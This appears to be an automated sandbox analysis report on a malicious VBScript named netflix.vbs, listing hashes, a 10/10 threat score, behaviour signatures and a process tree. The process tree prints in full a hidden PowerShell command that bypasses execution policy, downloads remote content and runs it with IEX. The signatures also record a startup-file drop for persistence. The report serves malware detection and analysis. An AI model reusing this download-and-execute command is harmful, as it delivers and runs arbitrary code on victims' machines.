Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    14/10/2023, 01:05

General

  • Target

    netflix.vbs

  • Size

    1000B

  • MD5

    3e4a20fd9f6d3e595eba5ab59c868cb6

  • SHA1

    660ba0a49f0d9db61c1054c78abbce232bc8401c

  • SHA256

    70d3f1296d41d516e04e53e58f812207d5f675ebb1e9686ed4b8552cb062544b

  • SHA512

    85838fd9828c8fc91f0985c8f3e3b1a3c03425e3aba5517104dcbd96c63115545758a625b59bf2d6beaf225758e8af375fc774d6cc612ebef9a126732c200dd8

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.netflix.com/

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\netflix.vbs"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:2292
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.netflix.com/');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; runnull
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2132
      • C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe
        C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.netflix.com/');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; runnull
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1940

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1940-3-0x00000000738A0000-0x0000000073E4B000-memory.dmp

    Filesize

    5.7MB

  • memory/1940-4-0x00000000738A0000-0x0000000073E4B000-memory.dmp

    Filesize

    5.7MB

  • memory/1940-5-0x0000000002620000-0x0000000002660000-memory.dmp

    Filesize

    256KB

  • memory/1940-6-0x0000000002620000-0x0000000002660000-memory.dmp

    Filesize

    256KB

  • memory/1940-7-0x00000000738A0000-0x0000000073E4B000-memory.dmp

    Filesize

    5.7MB

  • memory/1940-8-0x00000000738A0000-0x0000000073E4B000-memory.dmp

    Filesize

    5.7MB